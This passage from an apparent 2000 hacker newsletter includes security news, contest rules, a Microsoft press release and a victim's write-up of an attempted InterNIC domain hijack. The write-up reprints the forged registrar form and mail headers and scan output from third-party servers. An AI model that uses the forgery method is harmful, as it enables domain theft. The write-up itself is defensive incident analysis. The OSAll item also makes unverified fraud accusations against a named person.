On Friday January 8, 2000, OSAll (www.aviary-mag.com)
was taken off of its' Web server and all Internet
connectivity was lost. Any attempts to contact
aviary-mag.com for e-mail, FTP, http or other purposes
will simply be rebuffed by the current host.

Reasons

The reason for this disconnection is not currently known,
but rumors have begun to abound. This press release is
intended to do several things - particularly attempt to
settle those rumors. JP Vrasenevich, Frank Jones, the US
Government and others have all had reason to disconnect
OSAll. Of these, the only one who has definitely tried to
have OSAll disconnected is Mr. Vrasenevich, Webmaster
and founder of AntiOnline.

Vrasenevich has been complaining about OSAll to
Communitech.net, the former host, for almost a year.
Communitech.net added a Do Not Disconnect notice to
the account, explaining that they would ignore
Vrasenevich for the time being. Apparently these efforts
have either been misplaced or Frank Jones has gotten to
Communitech.net.

Frank Jones is President of Codex Data Systems, a fraud
of a computer security company. They offer $500
a-head-lectures that explain that you need to use
firewalls and claim to sell a product called "DIRT" to the
Federal Government. Unfortunately, Frank Jones' probation
for a conviction on defrauding the US Government
prevents him from doing business with the FBI or any
other federal agency. OSAll published an article regarding
their lectures, and Frank Jones was hardly happy about it.

Is OSAll Returning?

Yes! NWO.net, the San Diego 2600 (sd2600.net),
Radiusnet.net and several other sites have begun hosting
mirrors of OSAll. NWO.net and the San Diego 2600 are
exploring finding a permanent host for OSAll. In the mean
time, you can find OSAll at NWO.net/osall and
Radiusnet.net/~owl.

Starting on Wednesday, OSAll will be updated according
to its normal schedule.

--
Mike

@HWA

52.0 $10,000 USD up for grabs in PSS Storm Chaser 2000 white paper
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com/contest.html

Packet Storm: Storm Chaser 2000

The talk of distributed attack tools is causing quite a stir. Obviously we
are seeing just the tip of the iceberg with what is to come; attacks which
involve factors such as encryption, mobility, stealth, that are under
anonymous control, that update themselves, that use communication to
co-ordinate, that are controlled by hacktivists, cyberterrorists,
cybermilitia and, of course, governments. The Internet is truly becoming
the fourth battlefield, built on top of not just a civilian, but an
academic infrastructure. How do we defend our part of the Internet against
information warfare? Obviously there are more factors involved than just a
technical solution; we need to consider issues of policy, international
co-operation and co-ordination, and administration. But can we really wait
for governments and politicians to solve this problem when technology
increasingly outstrips policy? With this in mind, Packet Storm poses this
question:

What pure or applied technical measures can be taken to protect the
Internet against future forms of attack?

The Kroll-O'Gara Information Security Group and Packet Storm will offer
USD $10,000 for the best technical white paper which defines the problem
and answers the above question. Competition Rules are outlined below.
Winners will be announced at RSA 2000 in January.

Competition Rules

QUESTION

Kroll-O'Gara Information Security Group, Inc. ("Kroll-O'Gara ISG") and
Packet Storm, a website sponsored by Kroll-O'Gara ISG (collectivelly, the
"Sponsors") will offer USD $10,000 for the best technical white paper
which defines the problem and answers the following question:

"What pure or applied technical measures can be taken to protect the
Internet against future forms of attack?"

ELIGIBILITY

The Competition may be entered by anyone worldwide. The judges of the
Competition and all employees working with or associated with the Sponsors
or their affiliated companies or the review panel are not qualified and
may not participate in the competition.

Multiple entries by an individual are acceptable. Each entry must be
original and have its own entry form. Multiple authors for a paper are
allowed.

SUBMISSION FORMAT

Each entry shall consist of sufficient words to rigorously explore the
entrant�s proposed solution(s) to the satisfaction of the review panel.
All entries must be submitted in electronic form and include the author�s
name, address, telephone number and E-mail address. ASCII text and
PDF are the preferred formats for entry. Hand written or hard copy entries
will not be accepted. All papers will be made public from the Packet Storm
web site at http://packetstorm.securify.com after the winner is
determined.

All entries must be sent electronically to:

pss2000@packetstorm.securify.com

Sponsors reserve the right to modify the rules at any time. Current rules
of the competition are available at:

http://packetstorm.securify.com/contest.html

Entries may be encrypted using the pss2000 key, available on:

ldap://certserver.pgp.com/.

Each entrant must complete an Affidavit of Eligibility and Liability and
Publicity Release, except where prohibited by law. The completed Affidavit
of Eligibility and Liability and Publicity Release must be attached to the
end of the submission. Failure to include a completed Affidavit of
Eligibility and Liability and Publicity Release as part of the submission
will result in the disqualification of the submission. The form of the
Affidavit of Eligibility and Liability and Publicity Release can be found
at http://packetstorm.securify.com/contest.html.

REVIEW PANEL

The essays will be judged by a panel of security experts. The panel will
include at least two employees of the Kroll-O'Gara ISG as well as at least
3 other individuals selected by Kroll-O'Gara ISG from leaders in industry,
government, and academia.

JUDGEMENT CRITERIA:

Each eligible essay shall be judged on the basis of a 100 point scale
using the following criteria:

Creativity Design and architecture Scaleability Technical
merit For applied solutions, implementation feasibility For pure, or
theoretical papers, originality and depth of analysis

DEADLINE

All entries must be received at pss2000@packetstorm.securify.com no later
than midnight, PST on January 10, 2000 (as judged by our mail server, and
no, you do not get an extension if the date on our mail server is hacked).
The winner of the Competition will be publically announced at RSA2000,
held January 16-20, 2000 in San Jose, CA. If the winner refuses in writing
to accept the Competition prize, then the prize will be donated to the
Electronic Freedom Foundation.

NOTIFICATION

The winner will be notified via e-mail and telephone.

The submission of an entry constitutes an assignment to Sponsors of all
copyrights arising under both statute and the common law and all other
rights derivative therefrom of the entry. By entering the Competition,
entrants grant further permission for Sponsors to publish all or
part of the submitted essay and to use entrant's name in connection
therewith.

STATE, FEDERAL AND INTERNATIONAL REGULATIONS: This Competition is subject
to the provisions of all applicable International, Federal, State, and
regulations. This offer is void where prohibited. Taxes, customs
duties, fees, freight charges, and other related charges on prizes are the
sole responsibility of the winner.

ADDITIONAL TERMS

The Competition is subject to all applicable state and federal laws, shall
not conflict with any existing law and is void where prohibited.

Sponsors are not responsible for lost, late, incomplete, illegible, or
misdirected e-mail, for failed, partial or garbled computer transmissions,
or for technical failures of any kind. Sponsors reserve the right to
cancel or modify the Comptetition for any reason and at their sole
discretion. Sponsors' only obligations are to submit entries from eligible
entrants to the review panel according to the procedures and criteria set
forth in these Competition Rules and to award the prizes set forth herein,
subject to the terms, conditions and contingencies delineated herein. By
submitting an entry, entrant agrees that Sponsors' obligations are fair
and adequate consideration for any entry submitted and that entrant is not
entitled to and shall not seek any further compensation.

By participating in the Competition, entrant indemnifies Sponsors and
their respective directors, officers, employees, agents and affiliates and
waives all claim to intellectual property rights in the entry, including
patent rights and copyrights, and waives all other publication
rights, except where prohibited by law. To the extent that such waiver is
ineffective or unenforceable, entrant hereby grants Sponsors an unlimited,
unrestricted, perpetual, non-exclusive, transferable, royalty-free license
to use, copy, modify, display, and sublicense the entry and any and all
derivative works without geographical limitations or further compensation
to entrant of any kind and entrant waives any and all rights to which
entrant may be entitled, other than those set forth herein. Entrant agrees
that e-mail shall satisfy any written requirement which may apply to
intellectual property licenses. Upon request of Sponsors, entrant agrees
to obtain written consent from the owner of the copyright in the
application, if that person is not entrant, and to execute any documents
required to effectuate the terms of these Competition Rules.

As a condition of entering this Competition, entrant agrees that: (1) any
and all disputes, claims, and causes of action arising out of or connected
with this Competition, or any prizes awarded, shall be resolved
individually, without resort to any form of legal action, and
exclusively by arbitration under the International Arbitration Rules of
the American Arbitration Association in San Francisco, California; (2) no
claim, judgment or award shall be made against entrant's costs incurred,
including but not limited to legal costs, costs of labor, benefits,
salaries or the value of time expended by entrant or others in any manner
relating to, arising under, or resulting from entrant's participation in
the competition; (3) under no circumstances will entrant claim punitive
damages and entrant hereby waives all rights to claim punitive, incidental
and consequential damages and any other special, implied or derivative
damages.

The Competition Rules, or the rights and obligations of entrant and
Sponsors in connection with the Competition, shall be governed by, and
construed in accordance with, the laws of the State of California, U.S.A.
All pertinent federal, state, and local laws and regulations apply.

Odds of winning are dependent upon the number and quality of entries
received. Prizes must be accepted as awarded at the judges discretion and
are non-assignable and non-transferable. All judgements by the review
panel are final. The Sponsors reserve the right to not issue an award
should the review panel reach a consensus that none of the submitted
entries reach a sufficient quality level.

For further information email: pss2000@packetstorm.securify.com.

@HWA

53.0 Bill Gates hands over CEO hat to Steve Ballmer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.microsoft.com/presspass/press/2000/jan00/final25anv.htm

Bill Gates Promotes Steve Ballmer to President and CEO; Gates
Creates New Role as Chairman and Chief Software Architect
Gates and Ballmer preview strategy to transform company around
Internet User Experience and Next Generation Windows Services

REDMOND, Wash. -- Jan. 13, 2000 - Accelerating the company's major
strategy initiative, Microsoft Corp. today announced that its co-founder,
Bill Gates, has created a new role for himself -- Chairman and Chief
Software Architect -- so that he can dedicate all of his time to helping
drive the next generation Windows Internet platform and services.
Microsoft announced that Steve Ballmer becomes president and CEO,
and will take over management of the company.

These changes were announced following the release of Microsoft�
Windows� 2000, which the company said is a crucial building block of
its strategy to focus on software services -- a major technology shift
that will transform the industry in the way the Graphical User Interface
(GUI) and the Internet did. Driving this major shift is the need for a
better Internet User Experience to enable businesses, consumers and
developers to better personalize and tailor the services they use, and to
store and share the information they need -- any time, any place and
on any device.

At the core of this strategy are Microsoft's plans, announced today, to
assemble the first Internet-based platform of Next Generation Windows
Services (NGWS), which will power new products and services and
incorporate such features and capabilities as a new user interface,
natural language processing, application development approach, schema
and new file system -- all of which have been in development.

As part of this platform, Microsoft said that a key set of NGWS will be
hosted on the Internet and will be infused into future versions of
Windows. The NGWS platform will create a host of new opportunities for
other businesses, and is the foundation of the company's software
services strategy, first articulated in September of last year at
Microsoft's developer strategy day and described in further detail during
Bill Gates' November 1999 Comdex speech.

"It is a great pleasure for me to announce that Steve Ballmer -- my
long-term partner in building Microsoft and a great business leader -- is
being named CEO," said Gates. "These are dramatic times in our
industry. As we look ahead to what it will take to do an amazing job
executing against our new strategic direction of building next-generation
services for our customers, we recognize that we must refocus and
reallocate our resources and talents against our key priorities and
challenges."

"I'm returning to what I love most -- focusing on technologies for the
future. This was a personal decision, one I have discussed with Steve
and our board of directors for some time. Although I've been able to
spend more time on our technical strategy since naming Steve as
president in July 1998, I felt that the opportunities for Microsoft were
incredible, yet our structure wasn't optimal to really take advantage of
them to the degree that we should. Steve's promotion will allow me to
dedicate myself full-time to my passion -- building great software and
strategizing on the future, and nurturing and collaborating with the core
team helping Steve run the company."

Gates also indicated that Ballmer would become a member of the
Microsoft Corp. Board of Directors effective January 27.

"I am very excited and very honored," said Ballmer. "These are amazing
times full of remarkable opportunities. Microsoft has all of the right stuff
-- great people and great technology -- to dramatically take action on a
new strategy that builds on the company's heritage of applying software
know-how to the new world of software services -- a world we will
pioneer along with our partners.

"Software is the key to the future. It will drive and accelerate
innovations in hardware, wireless, broadband, e-commerce and other
fields. Our vision is to create a new services platform that will ignite new
opportunities for literally thousands of partners and customers around
the world," Ballmer said.

Setting Priorities: Microsoft Next Generation Windows Services
(NGWS)

Ballmer today outlined his core priorities and announced plans for a
major strategy day this Spring, when the company will outline details of
the Internet User Experience vision and strategy. Ballmer said Bill Gates
and Microsoft's four technical group vice presidents, including Paul
Maritz, Jim Allchin, Bob Muglia, and Rick Belluzzo, will drive developing
the technologies and user scenarios that are key to the success of the
Internet User Experience and Next Generation Windows Services.

About Microsoft

Founded in 1975, Microsoft (Nasdaq "MSFT') is the worldwide leader in
software for personal and business computing. The company offers a
wide range of products and services designed to empower people
through great software -- any time, any place and on any device.

For more information, media only:

Rapid Response Team, Waggener Edstrom, (425) 450-5019,
rrt@wagged.com

For more information, financial analysts only:

Carla Lewis, senior director, Microsoft Investor Relations, (425)
936-3703

Note to editors: If you are interested in viewing additional information
on Microsoft, please visit the Microsoft Web page at
http://www.microsoft.com/presspass/ on Microsoft's corporate
information pages.

@HWA

54.0 First Windows 2000 virus found
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Twstpair

http://www.maximumpc.com/content/2000/01/14/10598

First Windows 2000 Virus Discovered
Maximum PC

The first Windows 2000 specific virus was discovered earlier this week. It
was sent to research labs by the virus's author, apparently, and spreads
only on systems that have Windows 2000 installed.

The virus, which experts think is no big deal at this time because it doesn't
take exploit potential security holes, isn't in actual circulation yet. However,
major antivirus software makers are already making claims that the virus will
be detected by their software because of the way it works.

The virus, known as W2K.Installer.1676, only attempts to detect the operating
system it is installed upon and upon confirmation of a Windows 2000 operating
system just spreads.

W2K.Installer.1676 is a relatively conventional file virus and doesn't have
any significant damage-causing payload.

-=-

More Via HNN ;

http://www2.infoworld.com/articles/en/xml/00/01/13/000113enfsecure.xml?Template=/storypages/printarticle.html

First Windows 2000 virus detected

By Terho Uimonen

Anti-virus software vendor F-Secure announced it has received a sample of the first virus written specifically
to operate under Microsoft's forthcoming Windows 2000 operating system.

Known as Win2K.Inta, or Win2000.Install, F-Secure does not consider the virus to be a big threat since it
has received no reports that the virus is "in the wild," meaning that it has not yet been discovered outside of
controlled environments, said Mikko Hypp�nen, manager of anti-virus research at the Finland-based
company.

The virus operates only under Windows 2000 and is not designed to function at all under older versions of
Windows. Microsoft is scheduled to start commercial shipments of the new operating system by
mid-February.

"The interesting thing is that it already exists, not that it is a big threat," Hypp�nen said. "It will probably not
have much of a life span in the real world since ours, as well as other anti-virus software programs, already
can handle it."

From now on, however, most new viruses are likely to include compatibility with Windows 2000,
Hypp�nen added.

"Windows 2000 will be a widely-used operating system, and virus writers target the widest possible reach,"
he said.

F-Secure received a sample of the virus via an anonymous e-mail, as did several other leading anti-virus
software vendors, Hypp�nen said.

The virus was probably written by an international group of virus writers known as the 29A virus group, he
said. "It is the first Windows 2000 virus, so I think they are mainly after the media attention -- they want
their five minutes of fame."

Win2K.Inta works by infecting program files and spreads from one computer to another when these files are
exchanged. Once infected, the files do not grow in size, according to F-Secure, and the virus is capable of
infecting files with the following extensions: EXE, COM, DLL, ACM, AX, CNV, CPL, DRV, MPD, OCX,
PCI, SCR, SYS, TSP, TLB, VWP, WPC, and MSI.

This list includes several classes of programs that to date have not been susceptible to virus infection,
F-Secure said. For example, this virus will analyze Microsoft Windows Installer files (MSI), scan them for
embedded programs, and infect them, the company said in a statement.

The virus contains this text string, which is never displayed: (Win2000.Installer) by Benny/29A &
Darkman/29A, according to F-Secure.

Further information about the virus can be found at www.F-Secure.com/virus-info/v-pics .

Formerly known as Data Fellows Corp., the Finnish software company was founded in 1988 and late last
year changed its name to F-Secure Corp. Its North American headquarters are in San Jose, Calif.

F-Secure Corp., in Espoo, Finland, is at www.f-secure.com .

Terho Uimonen is a Scandinavian correspondent for the IDG News Service, an InfoWorld affiliate.

@HWA

55.0 InterNIC domain name hijacking: "It happens"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Your site may be open to attack vua indirect means, is your InterNIC record
secure? did you at least set a password when you registered your domain with
Network Solutions? your domain name could be seized by a wiley hacker and
redirected to anywhere on the net effectively hijacking your site's focus.

Here is an account of such an attack attempt...

Minimal background Info:

Leading email:

~ :A hax0r (mnemonic of keyr00t) tried this with me and Nokia (*shrug*). I
~ :wrote a brief account of what happened.
~ :
~ : Internic Domain Hijacking - "It Happens"
~ : http://dev.whitehats.com/papers/internic/index.html
~ :
~ :Of course, I have still heard *nothing* from Internic, AOL, or any parties
~ :involved in the attempted hijacking.
~ :

A friend of mine had several domains of him stolen the same way, when some
freak got access to his mailbox. it took me a week (including messing
around that dude boxen) to get all the stuff back. Otherwise it could take
months to go into legal trial to return the domain. Network solutions
really should have a better clue while dealing with such stuff.

-=-

KRS: Key R00t Systems
IRC: EFnet channel #!krs
Founder: Mnemonic (* AOL user)
Website(s): http://s-club.4mg.com/ (Now inactive)

-=-

Details of attack:

http://dev.whitehats.com/papers/internic/index.html

Internic Domain Hijacking - "It Happens"
Max Vision, http://www.maxvision.net/

OVERVIEW

This morning I witnessed an attempted takeover of one of my domains, MAXVISION.NET.
The attacker, calling themself "Mnemonic of the group KeyRoot", using an AOL.COM
address, attempted to spoof a request from me to change the primary and secondary
DNS servers for my domain, to Network Solutions / Internic. If successful, this
request would effectively give them control of maxvision.net until I could have
sorted it out with Internic. Their attempt was foiled for several reasons, which
I will outline below.

THE ATTACK

The attacker sent a forged Domain Modification form to Internic. There were several
incompotent errors in the submission that caused the submission to fail. Had these
errors not been made, and had I relied on the MAIL-FROM mechanism of Internic, then
control of my domain would have been effectively hijacked.

Overview of forged email path:

The first sign that something was going on was an email from Internic, confirming
"my request".

Email confirmation "response" from Internic

Date: Sun, 2 Jan 2000 17:19:50 -0500 (EST)
From: hostmaster@internic.net
To: Max Vision <vision@HUNGRY.COM>
Subject: Re: [NIC-000102.b318] Re: MODIFY DOMAIN maxvision.net

This is an automatic reply from Network Solutions to acknowledge that
your message has been received. This acknowledgement is NOT a
confirmation that your request has been processed.

If you need to correspond with us regarding this request, please be
sure to reference the tracking number [[NIC-000102.b318]] in the subject
of your message.

Regards,
InterNIC Registration Services
... other standard Internic advertising followed (omited)

Moments later I received an error message from Internic (the attacker had made a mistake),
which provided me with the evidence I needed to track the offender.

Email error "response" from Internic

Date: Sun, 2 Jan 2000 17:20:29 -0500 (EST)
From: Domain Registration Role Account <domreg@internic.net>
Reply-To: hostmaster@internic.net
To: vision@HUNGRY.COM
Subject: Re: [NIC-000102.b318] MAXVISION.NET

The Domain Name Registration Agreement below has been returned to you due
to the following errors. Please review the Domain Name Registration
Agreement instructions available at
ftp://www.networksolutions.com/templates/domain-template.txt.

The glossary of the parser errors is available at
ftp://www.networksolutions.com/templates/domain-parser-errors.txt

Network Solutions Registration Services
email hostmaster@networksolutions.com

dreg08

The attacker had tried to use the same DNS server as primary and secondary
=========================================================================
ERROR: duplicate item 8 <S-CLUB.4MG.COM>/<209.210.67.126>

Either the hostname or the IP address of a name server matches that of
another server in the server list.
=========================================================================

The From header was spoofed, the upper case indicates it was copied from my
whois record
>From vision@HUNGRY.COM Sun Jan 2 17:17:06 2000
>Received: from rs.internic.net (bipmx2.lb.internic.net [192.168.120.15])
> by opsmail.internic.net (8.9.3/8.9.1) with SMTP id RAA28490
> for <hostmaster@networksolutions.com>; Sun, 2 Jan 2000 17:17:05 -0500 (EST)
>Received: (qmail 6410 invoked from network); 2 Jan 2000 22:17:05 -0000
This mail server was used to bounce the message. LAME! See my mailrelay writeup.
Note that the attacker used smtp9.gateway.net which seems to forward through an
internal "gateway.net" server, thus the 192.168 non-routable address.
>Received: from relaye.gateway.net (HELO smtp9.gateway.net) (208.230.117.253)
> by 192.168.119.15 with SMTP; 2 Jan 2000 22:17:05 -0000
This indicates the attacker sent "HELO HUNGRY.COM" in their email forgery session
however, their true IP is shown as 152.201.160.206
>Received: from HUNGRY.COM (98C9A0CE.ipt.aol.com [152.201.160.206])
> by smtp9.gateway.net (8.9.3/8.9.3) with ESMTP id RAA13460
> for <hostmaster@networksolutions.com>; Sun, 2 Jan 2000 17:17:03 -0500 (EST)
>Message-ID: <386FCEFC.9D64F794@HUNGRY.COM>
>Date: Sun, 02 Jan 2000 17:19:40 -0500
>From: Max Vision <vision@HUNGRY.COM>
>Organization: Max Vision
They set this as part of their use of gateway.net to forge the email
>X-Sender: "Max Vision" <default@pop.gateway.net> (Unverified)
If they didn't forge this header, it looks like an outdated Netscape on win98
>X-Mailer: Mozilla 4.06 [en]C-gatewaynet (Win98; I)
>MIME-Version: 1.0
>To: hostmaster@networksolutions.com
>Subject: [NIC-000102.b318] Re: MODIFY DOMAIN maxvision.net
>Content-Type: text/plain; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>X-MTS-Ticket: 000102.b318
>X-MTS-Type: Domain
>X-MTS-Mode: Modify
>X-MTS-Priority: Normal
>X-MTS-Status: Open
>X-MTS-Timestamp: 000102171706
>
>
>----------------------------------------------------
>This is the Domain Name Registration Agreement you
>recently created.
>In order to complete this modification,
>
>YOU MUST E-MAIL THIS FORM TO: hostmaster@networksolutions.com
>
>After you e-mail this form, you should receive an auto-reply
>with a tracking number. You must use that number in the
>Subject of any future messages you send regarding
>this registration action.
>Once this registration action is completed you will receive
>a notification via e-mail.
>
>**** PLEASE DO NOT REMOVE Version Number or any of the information below
>when submitting this template to hostmaster@networksolutions.com. *****
>
>Domain Version Number: 5.0
>
>********* Email completed agreement to hostmaster@networksolutions.com
>*********
>
>
>AGREEMENT TO BE BOUND. By applying for a Network Solutions' service(s)
>through our online application process or by applying for and registering a
>domain name as part of our e-mail template application process or by using
>the service(s) provided by Network Solutions under the Service Agreement,
>Version 5.0, you acknowledge that you have read and agree to be bound by all
>terms and conditions of this Agreement and any pertinent rules or policies
>that are or may be published by Network Solutions.
>
>Please find the Network Solutions Service Agreement, Version 5.0 located
>at
>the URL <a
>href="http://www.networksolutions.com/legal/service-agreement.html">http://www.networksolutions
.com/legal/service-agreement.html</a>.
>
>
>[URL <a href="ftp://www.networksolutions.com">ftp://www.networksolutions.com</a>]
>[11/99]
>
>Authorization
The attacker used the wrong text here, ignorant switching of "Name" for "New"
>0a. (N)ew (M)odify (D)elete.........: M Name Registration
>0b. Auth Scheme.....................: MAIL-FROM
>0c. Auth Info.......................:
>
>1. Comments........................:
>
>2. Complete Domain Name............: maxvision.net
>
>Organization Using Domain Name
Here they retained my old contact info
>3a. Organization Name................: Max Vision
>3b. Street Address..................: 65 Washington Ave Suite 180
>3c. City............................: Santa Clara
>3d. State...........................: CA
>3e. Postal Code.....................: 95050
>3f. Country.........................: US
>
>Administrative Contact
and here they tried to make "themself" the admin contact
>4a. NIC Handle (if known)...........:
>4b. (I)ndividual (R)ole?............: Individual
>4c. Name (Last, First)..............: Stakl, Joe
>4d. Organization Name...............: Max Vision
there is no gGate street in this city, AFAIK
>4e. Street Address..................: 1458 Gate St.
>4f. City............................: Saint Mary
>4g. State...........................: MD
>4h. Postal Code.....................: 20618
>4i. Country.........................: USA
This number is invalid
>4j. Phone Number....................: 401-597-0588
>4k. Fax Number......................:
>4l. E-Mailbox.......................: vision@HUNGRY.COM
>
>Technical Contact
Same problems as Admin contact info above
>5a. NIC Handle (if known)...........:
>5b. (I)ndividual (R)ole?............: Individual
>5c. Name(Last, First)...............: Stakl, Joe
>5d. Organization Name...............: Max Vision
>5e. Street Address..................: 1458 Gate St.
>5f. City............................: Saint Mary
>5g. State...........................: MD
>5h. Postal Code.....................: 20618
>5i. Country.........................: USA
>5j. Phone Number....................: 401-597-0588
>5k. Fax Number......................:
>5l. E-Mailbox.......................: vision@HUNGRY.COM
>
>Billing Contact
How nice of them, leave me the bill
>6a. NIC Handle (if known)...........: MV777
>6b. (I)ndividual (R)ole?............: Individual
>6c. Name (Last, First)..............:
>6d. Organization Name...............:
>6e. Street Address..................:
>6f. City............................:
>6g. State...........................:
>6h. Postal Code.....................:
>6i. Country.........................:
>6j. Phone Number....................:
>6k. Fax Number......................:
>6l. E-Mailbox.......................:
>
These are the nameservers they intended to use in the hijacking
The IP addresses resolve to
>Prime Name Server
>7a. Primary Server Hostname.........: S-CLUB.4MG.COM
>7b. Primary Server Netaddress.......: 209.210.67.126
>
>Secondary Name Server(s)
>8a. Secondary Server Hostname.......: S-CLUB.4MG.COM
>8b. Secondary Server Netaddress.....: 209.210.67.126
>
>
>END OF AGREEMENT
>
>
>For instructions, please refer to:
>"http://www.networksolutions.com/help/inst-mod.html"

The trail of evidence is overwhelming. Here is the breakdown, then I'll
discuss each element:

attacker, using an AOL.COM IP address, send forged email using
GATEWAY.NET mail relay. This is known to be true, since the
networksolutions.com mail server (rs.internic.net) is resistant to TCP
spoofing, as is relaye.gateway.net. the AOL.COM address was
inactive, so they must have disconnected immediately after sending the
forged email (AOL absolutely does not care *at all* about this, and
all attempts to reach the abuse or security teams of AOL, Gateway.NET,
and Internic have yielded no reply. NO WONDER.) the contact
information was all false. The only point of control that the attacker
gets is the DNS service. If the attacker intended Denial of Service,
then they might not have control of the Linux DNS server. If the
attacker intended control of the domain, then they either own/operate
the Linux DNS server, or they have rooted the machine. The Linux DNS
server is a freeservers.com webhosting server - when the HTTP/1.1
hostname s-club.4mg.com is used, the following webpage appears
(indicating that they do have control of the linux server, and that
they intended to hijack my domain and Nokia's):

Internic's mail server is not vulnerable to TCP spoofing, which indicates
that the header information is valid - that a mail really did reach their
servers from the relay host, relaye.gateway.net.

not spoofed: rs.internic.net

rs.internic.net (198.41.0.6)

TCP Sequence Prediction: Class=truly random Difficulty=9999999
(Good luck!) Sequence numbers: 3763161D 84916A9 979391FC 660A454A 4D3417E0
5DD7DB3B

relaye.gateway.net is also not vulnerable to TCP spoofing, which indicates
that the header information is valid - that a mail really did reach their
servers from the attacker, 98C9A0CE.ipt.aol.com [152.201.160.206].

not spoofed: mail relay host

relaye.gateway.net (208.230.117.253):

TCP Sequence Prediction: Class=random positive increments
Difficulty=50749 (Worthy challenge) Remote operating system guess: BSDI
BSD/OS 3.0-3.1

Based on this information, the liklihood of the email being truly forged
(at the packet level) are extremely low. This appears to be a
straightforward application-level forgery from the AOL account.

Having a look at the DNS server that the attacker was trying to substitute
for mine, to control the domain, we see it is an older Linux system, that
is acting as a virtual webserver. I have contacted that rightful
administrators of the system about the attempted attack.

overview: substitute dns server

FreeServers.com - www26 Server Provo, Utah - USA www26.freeservers.com
(209.210.67.126): Port State Protocol Service 21 open tcp ftp 23 open
tcp telnet 25 open tcp smtp 37 open tcp time 80 open tcp http 111
open tcp sunrpc 113 open tcp auth 513 open tcp login 514 open tcp shell
2049 open tcp nfs 3306 open tcp mysql

TCP Sequence Prediction: Class=truly random Difficulty=9999999
(Good luck!) Remote operating system guess: Linux 2.0.35-37

HOW TO DEFEND YOURSELF

Internic offers three authentication methods for domain administrators.
MAIL-FROM, CRYPT-PW, and PGP. Each can be used to effectively protect
against this type of hijacking effect, each with increasing levels of
effectiveness. The following are summaries that discuss how each is
used. After each description I'll briefly discuss their vulnerabilities.

MAIL-FROM

MAIL-FROM is the most basic type of authentication scheme. Under this
level of protection, Network Solutions will verify that a Domain Name
Registration Agreement, Contact Form or Host Form was submitted from the
e-mail address, as listed in our database, of the administrative or
technical contact of the record to be changed.

MAIL-FROM checks to see that requests to update your contact record -- or
any record that you are associated with -- are sent from the current
E-mail address of the contact.

By default, all the contacts in the database have MAIL-FROM protection
unless they have used the Contact Form to associate their contact record
with a PGP key or an encrypted password. MAIL-FROM is the default
authentication scheme. If you are not sure which of the three options to
select, choose MAIL-FROM - it is the default.

MAIL-FROM is the default, and weakest security level. Don't follow their
advice, use CRYPT-PW at the minimum.

CRYPT-PW

In the protection hierarchy, encrypted password, or CRYPT-PW, is the next
highest level of protection for a domain name registration record.
CRYPT-PW allows updates to be submitted from any e-mail address, and, if
the correct password is supplied, Network Solutions will process the
Domain Name Registration Agreement, Contact Form or Host Form.

If you would like to guard your contact record -- and any other database
records that you are a contact for -- with a password, enter the plain
text of the password in the box below. After you enter the password
in the box below it will be encrypted and entered on the form in the
correct place. Enter the password a second time to verify that you have
entered the plain text of the password correctly. Do not lose this
password. Updates to database records may be significantly delayed if this
password is lost.

CRYPT-PW is a more secure authentication mechanism, as it requires the use
of the correct password to effect a domain change. This may be exceedingly
difficult to guess, as Internic may have anti-password-guessing measures in
place to curb endless "guesses".

PGP

Pretty Good Privacy provides the highest level of security. PGP is an
encryption and digital signature scheme. While 100% security can never be
guaranteed, PGP is a very safe scheme. In order to use PGP as your
authentication scheme, the PGP software must be installed on your
computer. This software is available both commercially and as freeware.

If you wish to protect your contact record -- and all records that you are
a listed contact for -- with Pretty Good Privacy encryption software,
choose this option.

IMPORTANT: You must obtain the PGP software and install it on your
computer before you can use this security feature. PGP is available
commercially and as shareware. To find out more about getting
started with PGP, read our help files on how to obtain and install PGP.
Your PGP key MUST be added to the Network Solutions' key server before you
can use the Contact Form to associate a PGP public key with this contact.
Enter the key ID of your PGP public key in the box below. If you have
installed the PGP software on your machine but you do not know your key
ID, type: pgp -kvc on your local machine to discover the eight digit key
ID of your PGP key.

IMPORTANT: If you have selected PGP, keep in mind that when the contact
template is generated and E-mailed to you, you must FIRST sign the update
request with your secret PGP key before sending the contact template
to NetworkSsolutions.

PGP is the strongest security level, as it is virtually impossible for an
attacker to guess the correct private key. PGP is widely held to be one of
the more secure/trusted forms of encryption/authentication.

There are also settings for "Notification Levels" for updates or usage. If
an attacker is aware of this, they can forge the request email, and then
forge an additional ACK email.

Notification Levels

The administrative and technical contact/agent will each choose when they
would like to be notified to validate a Domain Name Registration
Agreement, Contact Form or Host Form. The options they can choose from
are: BEFORE-UPDATE; AFTER-UPDATE; and NOT-CARE. The administrative and
technical contacts are not required to choose the same option. Network
Solutions will act upon the first reply we receive.

If the contact selects BEFORE-UPDATE, Network Solutions will send a
confirmation request before any changes are made, even if the request was
received from an authorized source. The contact then has the
opportunity to acknowledge the validity of the request by replying "ACK"
or "YES" to the notification. If the contact does not agree with the
change request, replying "NAK" or "NO" to the notification will prevent
any changes from being made. Selecting BEFORE-UPDATE may delay legitimate
changes while Network Solutions waits for approval to make the requested
change.

If the contact selects AFTER-UPDATE, Network Solutions will send a
confirmation request after changes have been made. Even if AFTER-UPDATE is
the selected level of protection, Network Solutions will only
process a Domain Name Registration Agreement, Contact Form or Host Form if
it was received from an authorized source, or if the registrant gives its
express written permission to make the requested change.

Both the administrative and technical contacts have the opportunity to
acknowledge the validity of the request by replying "ACK" or "YES" to the
notification. If either one of the contacts does not agree with the
change request, replying "NAK" or "NO" to the notification will usually
reverse any changes that were made. AFTER-UPDATE is the default option if
no other type of notification is selected.

If the contact selects NOT-CARE, Network Solutions will never send a

confirmation to that contact. By choosing this option, the contact

establishes that they are not concerned about whether or not

authorized changes are made to any domain name registration, contact

record or host record with which he is associated.

As stated above, MAIL-FROM is not really enhanced with the BEFORE-UPDATE

feature, as an attacker could forge a corresponding ACK message.

CONCLUSION

There are some serious security issues with the current Internic Guardian
system. Domain Hijacking is as easy as ever, and many newbie crackers have
been actively using this attack to hijack websites addresses. Over the Y2K
weekend it was rumored that several large sites suffered from this attack.

If you are a domain contact and have not set encryption authentication
options such as CRYPT-PW or PGP, then DO SO NOW!

Max Vision

@HWA

56.0 "A well known but overlooked threat to Hackers: Themselves"
